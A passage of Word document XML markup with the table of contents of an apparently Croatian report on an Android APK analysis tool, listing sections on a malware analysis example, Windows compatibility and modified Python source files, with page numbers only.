          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756616" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.4.5.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>APKInfo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756616 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756617" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.4.6.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Radio gumbi</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756617 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756618" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>4.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Primjer analize zloćudnog programa</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756618 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756619" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>4.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Zadatak</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756619 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756620" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>4.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Instalacija programa</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756620 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756621" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>4.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Analiza programa</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756621 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756622" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>4.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Zaključak analize</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756622 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756623" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>5.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Kompatibilnost programa za rad na Windowsima</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756623 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756624" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>5.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Opis nefunkcionalnosti programa</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756624 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756625" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>5.1.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Prikaz podataka u kartici CFG</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756625 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756626" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>5.1.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Prikaz podataka u  kartici AndroidManifest.xml</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756626 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756627" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>5.1.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Prikaz podataka u kartici Smali</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756627 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756628" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>5.1.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t xml:space="preserve">Prikaz </w:t>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>.java</w:t>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t xml:space="preserve"> datoteka</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756628 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756629" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>5.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Modificirani izvorni kodovi</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756629 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756630" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>5.2.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:i/>
            <w:iCs/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>xdotParser.py</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756630 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756631" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>5.2.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>APKtool.py</w:t>
        </w:r>
        <w:r>
          <w:rPr>
